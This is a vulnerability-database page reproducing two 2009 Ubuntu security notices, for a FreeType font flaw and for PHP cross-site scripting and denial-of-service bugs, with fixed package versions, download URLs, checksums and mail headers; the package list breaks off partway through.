English | Deutsch | Espa├▒ol | Portugu├¬s
 UserID:
 Passwd:
new user
 About:   Dedicated  | Advanced  | Standard  | Recurring  | No Risk  | Desktop  | Basic  | Single  | Security Seal  | FAQ
  Price/Feature Summary  | Order  | New Vulnerabilities  | Confidentiality  | Vulnerability Search
 Vulnerability   
Search   
    Search 61204 CVE descriptions
and 32582 test descriptions,
access 10,000+ cross references.
Tests   CVE   All  

===========================================================
Ubuntu Security Notice USN-767-1             April 27, 2009
freetype vulnerability
CVE-2009-0946
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 6.06 LTS:
  libfreetype6                    2.1.10-1ubuntu2.6

Ubuntu 8.04 LTS:
  libfreetype6                    2.3.5-1ubuntu4.8.04.2

Ubuntu 8.10:
  libfreetype6                    2.3.7-2ubuntu1.1

Ubuntu 9.04:
  libfreetype6                    2.3.9-4ubuntu0.1

After a standard system upgrade you need to restart your session to effect
the necessary changes.

Details follow:

Tavis Ormandy discovered that FreeType did not correctly handle certain
large values in font files. If a user were tricked into using a specially
crafted font file, a remote attacker could execute arbitrary code with user
privileges.


Updated packages for Ubuntu 6.06 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.10-1ubuntu2.6.diff.gz
      Size/MD5:    63243 6eced56657e507440d991ed5fb7e0507
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.10-1ubuntu2.6.dsc
      Size/MD5:      718 0187b6f8fec0809baf064ea6174385d5
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.1.10.orig.tar.gz
      Size/MD5:  1323617 adf145ce51196ad1b3054d5fb032efe6

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.6_amd64.deb
      Size/MD5:   717576 85fd921a50749842a931c2b6f52ee8bf
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.6_amd64.deb
      Size/MD5:   440082 e689c28c61a0d4c70cfc8e1823f861ea
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.6_amd64.deb
      Size/MD5:   133862 a63df79393b82314d708c1099209ea43
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.6_amd64.udeb
      Size/MD5:   251740 bf1479fbacd83ccfdaaf679d13d68e46

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.6_i386.deb
      Size/MD5:   677580 09a7c3c7559c93687887106c0916f193
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.6_i386.deb
      Size/MD5:   415800 5d17f49104f4e75ccd25aecb856b0f33
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.6_i386.deb
      Size/MD5:   117352 a972506957e5e40799eeb76c538a9ce2
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.6_i386.udeb
      Size/MD5:   227434 98fedf40c8a2ce5329a8132cd452bc0a

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.6_powerpc.deb
      Size/MD5:   708492 68a4995925bcd945e46ecd2927941be0
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.6_powerpc.deb
      Size/MD5:   430248 c67e9a322cb3ce40210282af049c20e9
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.6_powerpc.deb
      Size/MD5:   134264 0eaf8e8743688d696dc317fc347f8c6b
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.6_powerpc.udeb
      Size/MD5:   241536 c8b480f23f465753c9898808ed159daa

  sparc architecture (Sun SPARC/UltraSPARC):

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.1.10-1ubuntu2.6_sparc.deb
      Size/MD5:   683838 6f59a42cfa33aa7c218cd72230c3b508
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.1.10-1ubuntu2.6_sparc.deb
      Size/MD5:   411260 5dc0cc3f380b074c5c58122a44704a4d
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.1.10-1ubuntu2.6_sparc.deb
      Size/MD5:   120086 e8e04f15c6b55f38d019c97820169d8a
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.1.10-1ubuntu2.6_sparc.udeb
      Size/MD5:   222578 a8b45bf046a9f3c8e5edccf9ee562dde

Updated packages for Ubuntu 8.04 LTS:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.5-1ubuntu4.8.04.2.diff.gz
      Size/MD5:    34030 5fccbfbd34cf9ec5c20ec19d298575dd
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.5-1ubuntu4.8.04.2.dsc
      Size/MD5:      906 b627d379927f29c574fa825fa914caae
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.5.orig.tar.gz
      Size/MD5:  1536077 4a5bdbe1ab92f3fe4c4816f9934a5ec2

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.5-1ubuntu4.8.04.2_amd64.deb
      Size/MD5:   694072 d77aedf6ae28d5cf3f78fde6c673ce78
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.5-1ubuntu4.8.04.2_amd64.deb
      Size/MD5:   361534 ebe7428c86ec09817e1751c421072042
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.5-1ubuntu4.8.04.2_amd64.deb
      Size/MD5:   221294 da1213d0ab5b00d5696c4382224763ac
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.3.5-1ubuntu4.8.04.2_amd64.udeb
      Size/MD5:   258220 6b59878a409bdb52f3a839960f8ca919

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.5-1ubuntu4.8.04.2_i386.deb
      Size/MD5:   663334 be36bc9c6bb6640d7094f350d9e54859
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.5-1ubuntu4.8.04.2_i386.deb
      Size/MD5:   346626 eee8d191e0569d12681d3661aa8cd536
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.5-1ubuntu4.8.04.2_i386.deb
      Size/MD5:   201184 a8b3b1394b00153b564ed91b85fe9fff
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.3.5-1ubuntu4.8.04.2_i386.udeb
      Size/MD5:   243350 13de39536d6a5ba96728af9e98e9c08a

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.5-1ubuntu4.8.04.2_lpia.deb
      Size/MD5:   665104 2b0fb13ab4d9b35e18f258a2ca9f413f
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.5-1ubuntu4.8.04.2_lpia.deb
      Size/MD5:   346804 f88701a0e6bf9daaea61bf43deb4a706
    http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.5-1ubuntu4.8.04.2_lpia.deb
      Size/MD5:   205444 c161aec6bfec144b155fbe884b68f1d2
    http://ports.ubuntu.com/pool/universe/f/freetype/libfreetype6-udeb_2.3.5-1ubuntu4.8.04.2_lpia.udeb
      Size/MD5:   244250 7bfa8dd521d39b5ca60dde7756116c76

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.5-1ubuntu4.8.04.2_powerpc.deb
      Size/MD5:   687172 57949107ee5153b9855986f2a54fb99d
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.5-1ubuntu4.8.04.2_powerpc.deb
      Size/MD5:   357512 0c0f189d319e2468e2e2ee5ab775cd9a
    http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.5-1ubuntu4.8.04.2_powerpc.deb
      Size/MD5:   235464 8d78d9f6a846902f520cdda87b8a9b86
    http://ports.ubuntu.com/pool/universe/f/freetype/libfreetype6-udeb_2.3.5-1ubuntu4.8.04.2_powerpc.udeb
      Size/MD5:   254372 114f72c3f09ca692032d02b88156d490

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.5-1ubuntu4.8.04.2_sparc.deb
      Size/MD5:   658002 115e0959c5b3ee90c608330a650c73f6
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.5-1ubuntu4.8.04.2_sparc.deb
      Size/MD5:   331430 725e0d228448a4f2472cccdb1cfdd4fc
    http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.5-1ubuntu4.8.04.2_sparc.deb
      Size/MD5:   199682 5511ca256126a878c49c2652f8909e2c
    http://ports.ubuntu.com/pool/universe/f/freetype/libfreetype6-udeb_2.3.5-1ubuntu4.8.04.2_sparc.udeb
      Size/MD5:   227742 1a3ab995c86d12dcc39ebfac0b8eb30d

Updated packages for Ubuntu 8.10:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.7-2ubuntu1.1.diff.gz
      Size/MD5:    34014 9dbf40d8947ad72b6150ea0cadcff023
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.7-2ubuntu1.1.dsc
      Size/MD5:     1310 2b1e1d6a830d6780d2f1e991f499faf7
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.7.orig.tar.gz
      Size/MD5:  1567540 c1a9f44fde316470176fd6d66af3a0e8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.7-2ubuntu1.1_amd64.deb
      Size/MD5:   714744 272150906be43a5023e331249ac67a39
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.7-2ubuntu1.1_amd64.deb
      Size/MD5:   385030 da7e86a8bd2eac0cb6a22edeb439fe66
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.7-2ubuntu1.1_amd64.deb
      Size/MD5:   225376 f5070329475d13f727c995c6b288bf98
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.3.7-2ubuntu1.1_amd64.udeb
      Size/MD5:   268810 72e878fd0d41ed4e1cb2284b436d5569

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.7-2ubuntu1.1_i386.deb
      Size/MD5:   684262 41eeb0f56f7b9de1344e41987b48c82e
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.7-2ubuntu1.1_i386.deb
      Size/MD5:   369310 ed330c8529f64e4c3efe447b7262991c
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.7-2ubuntu1.1_i386.deb
      Size/MD5:   197738 8d4a605c30bb27877f424d39c0c45b81
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/libfreetype6-udeb_2.3.7-2ubuntu1.1_i386.udeb
      Size/MD5:   253868 0495a9df858479e8621af8a415e21333

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.7-2ubuntu1.1_lpia.deb
      Size/MD5:   686444 d8d8b8d80a7927943073c29783f529f2
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.7-2ubuntu1.1_lpia.deb
      Size/MD5:   369464 46f265d23c6b5151453553babbf1272a
    http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.7-2ubuntu1.1_lpia.deb
      Size/MD5:   200606 c69fe733317c5a27e478d47135f05366
    http://ports.ubuntu.com/pool/universe/f/freetype/libfreetype6-udeb_2.3.7-2ubuntu1.1_lpia.udeb
      Size/MD5:   254134 e7d0adb3dbd49d9ae3e75012763d10af

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.7-2ubuntu1.1_powerpc.deb
      Size/MD5:   707636 38f91efda5d37e0b94d4978db97e3bb3
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.7-2ubuntu1.1_powerpc.deb
      Size/MD5:   377142 4ecbf680e3081f51d0c96157453e3366
    http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.7-2ubuntu1.1_powerpc.deb
      Size/MD5:   226534 3b531d2a4ad444ec18d22eeaedc6efcc
    http://ports.ubuntu.com/pool/universe/f/freetype/libfreetype6-udeb_2.3.7-2ubuntu1.1_powerpc.udeb
      Size/MD5:   261810 a648a148a0e9ad44ce10d88875c28e52

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.7-2ubuntu1.1_sparc.deb
      Size/MD5:   675998 03ece4005fbc4a29402e8247485e2d0c
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.7-2ubuntu1.1_sparc.deb
      Size/MD5:   349982 9a4f121b866445be99ef92b88e2f3fe3
    http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.7-2ubuntu1.1_sparc.deb
      Size/MD5:   200646 d27581465861fcf9a851698d739bf88e
    http://ports.ubuntu.com/pool/universe/f/freetype/libfreetype6-udeb_2.3.7-2ubuntu1.1_sparc.udeb
      Size/MD5:   235092 6163a0bd37680f8b3df7bdfca188db44

Updated packages for Ubuntu 9.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.9-4ubuntu0.1.diff.gz
      Size/MD5:    36631 982bfae418763751b6adb4d0b007511b
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.9-4ubuntu0.1.dsc
      Size/MD5:     1310 f384ff386a01582076f2c2408596ab58
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/freetype_2.3.9.orig.tar.gz
      Size/MD5:  1624314 7b2ab681f1a436876ed888041204e478

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.9-4ubuntu0.1_amd64.deb
      Size/MD5:   729206 b48fc9907dbad4ed87918d23e7ee1fb8
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-udeb_2.3.9-4ubuntu0.1_amd64.udeb
      Size/MD5:   272746 58638602d26c387c4d2a115c787d15e8
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.9-4ubuntu0.1_amd64.deb
      Size/MD5:   406250 378224725aee8445f3cf447bc716a7af
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.9-4ubuntu0.1_amd64.deb
      Size/MD5:   226370 bc6debd3635e03350cd6d9bbf765ad3c

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-dev_2.3.9-4ubuntu0.1_i386.deb
      Size/MD5:   697634 49f0a72a2f6b297f533130d5b35f082c
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6-udeb_2.3.9-4ubuntu0.1_i386.udeb
      Size/MD5:   257748 f0286eee94412e898a53ed58697521bf
    http://security.ubuntu.com/ubuntu/pool/main/f/freetype/libfreetype6_2.3.9-4ubuntu0.1_i386.deb
      Size/MD5:   391634 a24b1bb441f4901d5cbf6347eabd277c
    http://security.ubuntu.com/ubuntu/pool/universe/f/freetype/freetype2-demos_2.3.9-4ubuntu0.1_i386.deb
      Size/MD5:   198696 d75df0ec8356af1d8792bff2e2456459

  lpia architecture (Low Power Intel Architecture):

    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.9-4ubuntu0.1_lpia.deb
      Size/MD5:   698720 c334c49293dcb55d0de7266d5def91ae
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-udeb_2.3.9-4ubuntu0.1_lpia.udeb
      Size/MD5:   257666 b4a658d726dba4e198a7601ef503c621
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.9-4ubuntu0.1_lpia.deb
      Size/MD5:   392168 fd4c73c8704c8b2b95c7e63aa67228b6
    http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.9-4ubuntu0.1_lpia.deb
      Size/MD5:   201526 4e05b9516e4369d6ea7c3486f3411d5a

  powerpc architecture (Apple Macintosh G3/G4/G5):

    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.9-4ubuntu0.1_powerpc.deb
      Size/MD5:   719880 d397634553bff1be5704c5e6ee572173
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-udeb_2.3.9-4ubuntu0.1_powerpc.udeb
      Size/MD5:   265694 4ce19350999978e0e16d98e6c7d4d5c3
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.9-4ubuntu0.1_powerpc.deb
      Size/MD5:   399528 8d3f0bdc81c7d2ad84e8146225c3c69c
    http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.9-4ubuntu0.1_powerpc.deb
      Size/MD5:   227754 18e452ce2daf53958e707a721e717239

  sparc architecture (Sun SPARC/UltraSPARC):

    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-dev_2.3.9-4ubuntu0.1_sparc.deb
      Size/MD5:   689200 ee24ef498fb19e18b61b8ddad65bd00a
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6-udeb_2.3.9-4ubuntu0.1_sparc.udeb
      Size/MD5:   238112 23a3f6268a807ca623eb2ac3722c392c
    http://ports.ubuntu.com/pool/main/f/freetype/libfreetype6_2.3.9-4ubuntu0.1_sparc.deb
      Size/MD5:   371724 928cff8f549020285bef41b79aa00f49
    http://ports.ubuntu.com/pool/universe/f/freetype/freetype2-demos_2.3.9-4ubuntu0.1_sparc.deb
      Size/MD5:   201360 812a74c8596405e1bcd8e0d97352cca7



--=-GRAMJRTxywCB/UCvZqMR
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iEYEABECAAYFAkn2Iv8ACgkQLMAs/0C4zNqA1QCfaxGms7kespeKhoGEgx9rnadz
HO0AniSVyzYGNfySsUi2p4vgoO0l9oXt
=9w3Q
-----END PGP SIGNATURE-----

--=-GRAMJRTxywCB/UCvZqMR--

From - Tue Apr 28 12:38:30 2009
X-Account-Key: account7
X-UIDL: 4909bb8c0000758a
X-Mozilla-Status: 0000
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-40156-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing2.securityfocus.com (outgoing.securityfocus.com [205.206.231.26])
by mx.securityspace.com (Postfix) with ESMTP id 40862EC177
for <lists@securityspace.com>; Tue, 28 Apr 2009 12:33:42 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing2.securityfocus.com (Postfix) with QMQP
id AA89A143824; Tue, 28 Apr 2009 09:04:09 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3544 invoked from network); 27 Apr 2009 21:16:40 -0000
Subject: [USN-761-2] PHP vulnerabilities
From: Marc Deslauriers <marc.deslauriers@canonical.com>
Reply-To: Ubuntu Security <security@ubuntu.com>
To: ubuntu-security-announce@lists.ubuntu.com
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Content-Type: multipart/signed; micalg="pgp-sha1"; protocol="application/pgp-signature"; boundary="=-YJVxDWSNOYIDe9YAAfM9"
Date: Mon, 27 Apr 2009 17:24:55 -0400
Message-Id: <1240867495.12065.1.camel@mdlinux.technorage.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.26.1 
Status:   


--=-YJVxDWSNOYIDe9YAAfM9
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

===========================================================
Ubuntu Security Notice USN-761-2             April 27, 2009
php5 vulnerabilities
CVE-2008-5814, CVE-2009-1271
===========================================================

A security issue affects the following Ubuntu releases:

Ubuntu 9.04

This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the
following package versions:

Ubuntu 9.04:
  libapache2-mod-php5             5.2.6.dfsg.1-3ubuntu4.1
  php5-cgi                        5.2.6.dfsg.1-3ubuntu4.1
  php5-cli                        5.2.6.dfsg.1-3ubuntu4.1

In general, a standard system upgrade is sufficient to effect the
necessary changes.

Details follow:

USN-761-1 fixed vulnerabilities in PHP.
This update provides the corresponding updates for Ubuntu 9.04.

Original advisory details:

 It was discovered that PHP did not sanitize certain error messages when
 display_errors is enabled, which could result in browsers becoming
 vulnerable to cross-site scripting attacks when processing the output.
 With cross-site scripting vulnerabilities, if a user were tricked into
 viewing server output during a crafted server request, a remote attacker
 could exploit this to modify the contents, or steal confidential data
 (such as passwords), within the same domain. (CVE-2008-5814)
 
 It was discovered that PHP did not properly handle certain malformed
 strings when being parsed by the json_decode function. A remote attacker
 could exploit this flaw and cause the PHP server to crash, resulting in a
 denial of service. This issue only affected Ubuntu 8.04 and 8.10.
 (CVE-2009-1271)


Updated packages for Ubuntu 9.04:

  Source archives:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.6.dfsg.1-3ubuntu4.1.diff.gz
      Size/MD5:   187291 00163cced82382ba501edbf0dfe73a90
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.6.dfsg.1-3ubuntu4.1.dsc
      Size/MD5:     2542 29c2b8b8e43b6a74e7858bc5e9211ddc
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.6.dfsg.1.orig.tar.gz
      Size/MD5: 12173741 b80fcee38363f031229368ceff8ced58

  Architecture independent packages:

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.2.6.dfsg.1-3ubuntu4.1_all.deb
      Size/MD5:   329660 57a38331745f615128acc5eb2cb93d21
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.2.6.dfsg.1-3ubuntu4.1_all.deb
      Size/MD5:     1122 a7bc1c04d5f59af5d335c9008eeb3547

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:  2614744 40eb2975c03b9c7606c7657cad163e92
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:  5091040 754f144c124ed06590b52e50f306731e
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:  2570356 4680afb5680815c9a391add86743e5e3
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:   371976 8ac081a997503bd1209252fe2634b947
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    25466 0d3e9d553b77e89c1d7f155d80cb303c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dbg_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:  8326788 6976570e9cf06b7a7f616d84f90f1beb
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:   362928 c4cafb303990a7486771e0962aef42a1
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    37210 00f5de4981f6d9e80b5e45bc6458e3fb
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gmp_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    16564 89022a28de0623a84005c70eaca5e319
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    20340 31451e0efcdac7c68fbea8e40aabf14e
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:     5634 d33ff4d927e1cf8188daca3c51a90244
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    74258 87eb15879cba4e14a1fc699d3790ced4
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    38056 2bab17a8e312f9d6d47ad7e0257e7c55
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    57774 9a747d7140fa934758944853a330a478
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pspell_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:     9556 a7c6dc612b4763987e4a0f99e2c669d6
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:     5148 f611947f090e3970c2bdc2a81d3a50f0
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    12606 0951b0bd1180a9ff0242db39d1b33601
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    39804 53c597a3330a4197a90c71eccd5fc2de
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    28704 fd5b07c7fa1f25a05047fa1149197cae
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-tidy_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    18102 7672f00fc2b43d5b1098f219b5e180d9
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    39510 c9361704c5ca84815b97816a0dd1c316
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:    14018 0b38293200e367b91dc2c2ba503f8c2d
    http://security.ubuntu.com/ubuntu/pool/universe/p/php5/libapache2-mod-php5filter_5.2.6.dfsg.1-3ubuntu4.1_amd64.deb
      Size/MD5:  2613030 27ee9f6c756e218643f827aaa3d87ee0

  i386 architecture (x86 compatible Intel/AMD):

    http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:  2483016 7e7e8bae0066e670863fa985066cac9c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:  4935186 22bc0b6b65b4dd5cd35b8ba0e301b18a
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:  2487744 78b2a302d89b9fcff54998a16c084b5c
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:   368304 40f905e82252d2ba6d3a88aef0603ff9
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:    23920 a47e3474a4aeefac1eac91fb30082fc1
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dbg_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
      Size/MD5:  8518218 e3007036547f5f8a6439fc257656f9b0
    http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.2.6.dfsg.1-3ubuntu4.1_i386.deb
